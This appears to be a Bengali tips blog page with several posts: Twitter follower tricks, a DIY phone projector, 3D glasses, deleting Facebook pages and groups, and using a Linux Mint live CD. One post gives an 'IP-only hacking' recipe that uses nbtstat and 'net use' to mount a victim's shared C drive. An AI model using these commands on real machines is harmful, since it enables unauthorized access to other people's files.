টিপস এন্ড ট্রিকস

বিসমিল্লাহির রহমানির রহিম
***টুইটারে ফলোয়ার বাড়ানোর শেষ্ঠ উপায়....

twiends
জনপ্রিয় মাইক্রো ব্লগিং টুইটারে ফলোয়ার বাড়ানোর বেশ কিছু উপায় আছে। তবে কাউকে ফলো করে তাকে ফলোয়ার হিসাবে পাওয়া যায় অনেকটা গিভ এ্যান্ড টেক পদ্ধতিতে। এমনই একটি সাইট হচ্ছে টুইটেন্ডস।
এজন্য প্রথমে www.twiends.com সাইটে গিয়ে Add Your Twitter Now Free! বা Sign in with twitter বাটনে ক্লিক করে টুইটার দ্বারা লগইন করে Authorize app এ ক্লিক করে অথোরাইজ দিতে দিন।
এবার Email & country এর Setup now এ ক্লিক করে ইমেইল ঠিকানা, দেশের নাম লিখে Save changes বাটনে ক্লিক করুন এবং প্রাপ্ত মেইলের লিংকে ক্লিক করে মেইল ঠিকানা ভেরিফাই করুন তাহলে আপনার অ্যাকাউন্টে ১০টি সীড যুক্ত হবে।
এরপরে Choose interests এর Select some now এ ক্লিক করে পপআপ থেকে ৫টি ট্যাগ যুক্ত করুন।
এবার Tweet about us এর Tweet now এ ক্লিক করে একটি টুইট করুন।
এরপরে উপরে ডানে Settings এ ক্লিক করে Change your follower options এ ক্লিক করুন। এখানে Step 6: Follow Back এ Follow back those who follow me চেক বক্স চেক করে ড্রপডাউন থেকে Only follow back those with seeds এ নির্বাচন Save করুন।
এরপরে কয়েকজনকে ফলো করে সীড অর্জন করুন এবং টুইটেন্ডস বন্ধ করুন। ব্যাস এরপরে কেউ আপনাকে ফলো করলে আপনার ২টি সীড কমে যাবে এবং উক্ত ফলোয়ারের ২টি সীড যুক্ত হবে এবং আপনি তাকে সয়ংক্রিয়ভাবে ফলো করবেন এবং আপনার সীড যুক্ত হবে। এভাবে আপনার ফলোয়ার এবং ফলোয়িং প্রতিনিয়তই বাড়তে থাকবে।
প্রথম প্রকাশ: http://www.shamokaldarpon.com/?p=3054

 ***বানিয়ে নিন একটি প্রজেক্টর! কিঞ্চিত মজা পাবেন!

সিনেমাহলে নিশ্চয়ই গেছেন। আর তা না গেলেও বর্তমানে কোথাও না কোথাও অবশ্যই প্রজেক্টর নামক বস্তুটি দেখেছেন। প্রজেক্টরের কাজ মুলত ইনপুটকে তীব্র আলোকমালায় রুপান্তরিত করে নিক্ষেপ করা। সেই আলোকমালা যখন কোন অবজেক্টে বাধা পায় তখন আমরা সেখানে আমাদের ইনপুটকৃত ইমেজটির প্রতিফলন দেখতে পাই।

প্রজেক্টর যেমন ইমেজকে বহুগুনে বর্ধিত করে তেমনি এর মুল্যও আমাদের বতমান বাজারে বহুগুনে বর্ধিত। মানসম্মত একটি প্রজেক্টর বগলদাবা করতে হলে আপনাকে গুনতে হবে কমকরে হলেও পঞ্চাশ হাজার টাকা। তাই বলে কি আমরা বড়পর্দায় কোন কিছু দেখার স্বাদ পেতে পারিনা? অবশ্যই। যদিও ব্যাপারটি অনেকটা দুধের স্বাদ ঘোলে মেটানোর মতো তবুও চেষ্টা করে দেখতে দোষ কি?

যা যা লাগবে-

১। একটি ব্যাডমিন্টন এর কর্কের খালি প্যাকেট।

২। ভালো মানের একটি ম্যাগনিফাইং গ্লাস।
৩। সাদা পর্দা (সাদা ওয়াল বা সাদা আর্ট পেপার টাঙ্গিয়ে নিন)
৪। একটি মাল্টিমিডিয়া মোবাইল সেট। (স্ক্রীন যত বড়, উজ্জল এবং বেশি রেজুলেশন হবে ছবি ততই স্পষ্ট হবে)

কাজের ধাপ-

১। প্রথমে কর্কের বক্সটি নিচের ছবির মতো করে কাটুন। তার আগে আপনার মোবাইলটির প্রস্থ মেপে নিন। এবং সেই অনুযায়ী কাটতে পারলে ভালো।

২। ম্যাগনিফাইং গ্লাসটা এই ভাবে বক্সের মাথায় সেট করুন। ম্যাগনিফাইং গ্লাস যত বড় এবং উন্নত হবে আপনার ছবি তত ভালো হবে।

৩। এবার আপনার পছন্দের একটি গান মোবাইলে চালু করে সেটাকে ফুলস্ক্রীন করুন। তার আগে যদি আপনার সেটে ডিসপ্লে লাইট এডজাষ্ট করা যায় তবে সেটাকে যথা সম্ভব উজ্জল করে নিন।
৪। এখন ছবিতে দেখানো মতো মোবাইলটি বক্সের মধ্যে সেট করুন।

৫। সাদা পর্দা তৈরি করেছেনতো? নাহলে সেটার ব্যবস্থা করুন।
৬। আপনাকে আর আলোতে রাখা সম্ভব নয়। ঘরের দরজা জানালা লাগিয়ে লাইট অফ করে ঘরকে একেবারে ঘুটঘুটে অন্ধকার করে ফেলুন।
৭। এবার রাইফেল স্টাইলে আপনার যন্ত্রপাতি সাদা পর্দার দিকে তাক করুন। আপনার মোবাইলে যে মুভি চলছে তার উল্টো প্রতিবিম্ব পর্দায় দেখতে পাবেন।
৮। যদি ঝাপসা আসে তবে মোবাইলটি লেন্স থেকে কাছে দুরে করে এডজাষ্ট করে নিন।


এবার উপভোগ করুন ঘোলের থুড়ি প্রজেক্টরের স্বাদ।
* আমি আমার ল্যাপটপ দিয়ে এই দুষ্কর্ম সাধনের অপচেষ্টা করেছিলাম কিন্তু ম্যাগনিফাইং গ্লাস ছোট হওয়ায় সেটা সফলতার মুখ দর্শন করেনি। তবে ছোট পর্দা করে গান বা টিভি চালিয়ে ছাদের দিকে তাক করে চিতপটাং হয়ে শুয়ে মাঝে মাঝে উপভোগ করি।
* চেষ্টায় আছি মোবাইলের স্ক্রীনে অস্ত্রপচার করে সেটার পিছনে লাইট লাগিয়ে কোনভাবে জোরাল ফ্লাশ করা যায় কিনা। কিন্তু সামনে পরীক্ষা। গবেষনার পিছনে সময় দেয়া যাচ্ছেনা। সফল হলে আপনাদের সাথে শেয়ার করবো।
* আবারোও বলছি ম্যাগনিফাইং গ্লাস এবং আপনার মোবাইলের ডিসপ্লে যত উন্নত হবে রেজাল্ট ততই ভালো পাবেন।
* এত ঝামেলা না করতে চাইলে অপেক্ষায় থাকুন কখন ইন্ডিয়ার Spice ফোনটি আমাদের বাজারে আসে। বিশ্বকাপ চলাকালীন সবাই নিশ্চয়ই দেখেছেন ফোনটার এ্যাড। আমিও ওই অপেক্ষাতেই আছি।

*** নিজেই তৈরী করুন 3D চশমা

কেমন আছেন আমার ব্লগার বন্ধুরা! সবাই ভালো তো? আশা করি সবার ভালো লাগবে।

সাধারণত  3D ছবি দেখার জন্য 3D চশমা লাগে আর বাজারে বিভিন্ন দামের 3D চশমা কিন্তে পাওয়ায় কিন্তু কেমন হয় যদি হাতের কাছে থাকা জিনিস দিয়ে আমরা নিজেরাই তৈরী করি 3D চশমা। খুব মজার হয় তাইনা
undefined
তাহলে আর দেরি না করে ভিডিও টিউটোরিয়াল টি ডাউনলোড করে নিন এবং নিজেই তৈরি করে ফেলুন 3D চশমা।
কেমন লেগেছে কমেন্ট করেন ।

***ফেসবুকের ফ্যান পেজ ও গ্রুপ এখন সহজেই মুছে ফেলুন.....
আমরা যারা ফেসবুক ব্যবহার করি তারা অনেকেই বিভিন্ন ফ্যান পেজ আর গ্রুপ ওপেন করি। মাঝে মাঝে এগুলো মুছে ফেলতে চাই। কিন্তু তা অনেকেই পারে না। তাই আজকে আপনাদেরকে জানাবো কিভাবে নিজের তৈরী ফেসবুকের ফ্যান পেজ এবং গ্রুপ বন্ধ করা যায়।
ফেসবুক ফ্যান পেজ বন্ধ করা:
১। প্রথমে আপনার পেজে গিয়ে Edit page > Admin Roles এ ক্লিক করুন।
২। তারপর যে পেজ খুলবে সেখান থেকে manage permissions এ ক্লিক করুন। (সমস্যা হলে ৩নং এর ছবিটা দেখুন।)
৩। এখন ওপেন হওয়া পেজের একদম নিচে Permanently delete ....... লেখা আছে। সেখানে ক্লিক করুন।
৪। Delete লেখা আসবে। এবার Delete লেখাটি ক্লিক করুন। ব্যাস আপনার পেজটি চিরতরে মুছে যাবে।
ফেসবুক গ্রুপ মুছা বা বন্ধ করা:
১। প্রথমে আপনার তৈরী গ্রুপের পেজটি খুলেন।
২। এবার About লেখাটি ক্লিক করুন।
৩। এবার যে পেজ টি ওপেন হবে সেখান থেকে All members লেখাটিতে ক্লিক করুন।
৪। এবার যে পেজটি আসবে সেখানে আপনার গ্রুপের সকল সদস্যদের তালিকা আসবে।  এবার আপনারটি ছাড়া বাকি সকল মেম্বারকে মুছে ফেলুন। এখন শুধু আপনারটিই বাকি থাকবে।
৫। এবার চিত্রে চিহ্নিত স্থানে ক্লিক করুন।
৬। এবার যে বক্সটি এসেছে সেখান থেকে Delete Group লেখায় ক্লিক করুন। ব্যাস আপনার গ্রুপটি মুছে যাবে।
আজ এই পর্যন্ত। আবার দেখা হবে অন্য কোন বিষয় নিয়ে।

***আজ আমি আপনাদের দেখাব কিভাবে শুধু আই পি এড্রেস দিয়ে যেকোনো পিছি হ্যাক করে পারবেন।

চলুন সুরু করিঃ
Step 1:
star মেনু তে যান এবং রান ওপেন করুন আর cmd লিখে enter চাপুন command prompt ওপেন হবে।
Step 2:
Type in cmd as "nbtstat -a IPaddressOfVictim"  এবং enter চাপুন।
যেমনঃ
nbstat -a 223.222.222.222
আপনি যদি দেখতে পান NetBIOS Remote Machine Name Table
Name Type Status ---------------------------------------------------------------
user<00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered
MAC Address = xx-xx-xx-xx-xx-xx
---------------------------------------------------------------
আপনি যদি <20> নাম্বার টা না দেখতে পান তাহলে অন্য ip দিয়ে চেষ্টা করুন।
কারন আপনার ভিকটিম File And Printer Sharing বন্ধ করে রেখেসে (যেটা আমরা তার পিসি তে ঢোকার জন্য ব্যবহার করব।
Step 4:
এখন এই command টি দিন  "net use x: \\IPaddressOfVictim\CDISK" এবং  enter চাপুন>
"IPaddressOfVictim এখানে আপনার ভিকটিম আর ip দিন।
আপনি 'x' এর জায়গায় যেকোনো লেটার দিতে পারেন।
জেমনঃ
net use x:\\223.222.222.222\CDISK
Step 5:
যদি সফল হন তাহলে আপনার my computer এ একটা network drive যুক্ত হয়েসে।
                                                                                              
MRN hacker















***এবার হার্ড ডিস্ক ছাড়াই PC চালান সাথে নেটও চলবে
অনেক দিন আগে একবার আমার হার্ড ডিস্কে কিছু প্রব্লেম এর জন্য exchange করতে দোকানে পাঠাতে হয়ে ছিল। তখন অনেক দিন কম্পিউটার বন্ধ ছিল, তখন অবশ্য windows xp live cd দিয়ে মাঝেমধ্যে চালাতাম কিন্তু নেট ইউস করতে পারতাম না (জানতাম ও না) আর সত্যি কথা যারা windows 7 ইউস করেছে তাদের xp খুব একটা ভালো লাগেনা তাই ইচ্ছাও করত না । তাই internet cafe তে যেতাম । সেই থেকে খুজে খুজে অবশেষে একটা উপায় পেলাম। এখন হার্ড ডিস্ক ছাড়াও  pc তো চলবেই এমনকি নেটও চালানো যাবে।
আমার pc তে ডুয়েল বুট করা আছে- windows7 আর Ubuntu, এই উবুন্টু ঘাটতে-ঘাটতেই  পেলাম linux mintএর খোঁজ। এর জন্য যাদের অশেষ অবদান তারা হলেন
এইসব ব্লগ গুলো না দেখলে এত সব কিছু জানতেই পারতাম না।
লিনাক্স মিন্ট (মায়া) ১৩ ডাউনলোড  করলাম এবং isoসিডি বানালাম  এই সিডিটাই live cdর কাজ করছে। এবং শুধুতাই নয় আমার cdma মোডেমের জন্য একটা software install করতে হয়, সেটার দরকার হলনা( উইন্ডোজ এর software এখানে অবশ্য কাজ করেনা)।
এখানে দেখুন আমার কম্পিউটার এ  হার্ড ডিস্কে দেখা যাচ্ছে,
এবার দেখুন এখানে হার্ড ডিস্কে নেই,( আমি সাটা সব কেব্‌ল খুলে কাজ করেছি)
এবার দেখুন net connected
এই Live cd টা চলাকালীন নেট connect করা খুব সহজ, নিচে দেখুন
প্রথমে এখানে ক্লিক করে ( নিচে) আপনাকে নেট কানেকশনের  কনফিগার করতে হবে।
আর লিনাক্স মিন্ট নিয়ে কি বলব, তারচে বরং নিচের ইমেজ গুলো দেখুন
এবার আপনার মনেহতে পারে সবই তো হল, কিন্তু ডাউনলোড করে রাখবো কোথায়। এর জন্য একটা পেন ড্রাইভ লাগিয়ে নিন আপনার পিসিতে আর সেভ করার সময় পেন ড্রাইভ কে দেখান, ব্যাস হয়ে গেল.
এই ব্লগটা লিনাক্স মিন্ট দিয়েও শুরু করা যেত, আমি একটু ঘুরিয়ে লিখলাম। তবে একটা কথা এরকম ব্লগ তাদের জন্যই যারা- আমার মত এসব ব্যাপারে খুব একটা জানে না । যারা এব্যাপার গুলো জানেন তাদের জন্য এ ব্লগ নয়, তবুও আপনাদের ধন্যবাদ এতক্ষন  পুরো ব্লগ টা পড়ার জন্য।
পুরো ব্লগ টা পড়ার জন্য।

***

0 মন্তব্য(গুলি):

একটি মন্তব্য পোস্ট করুন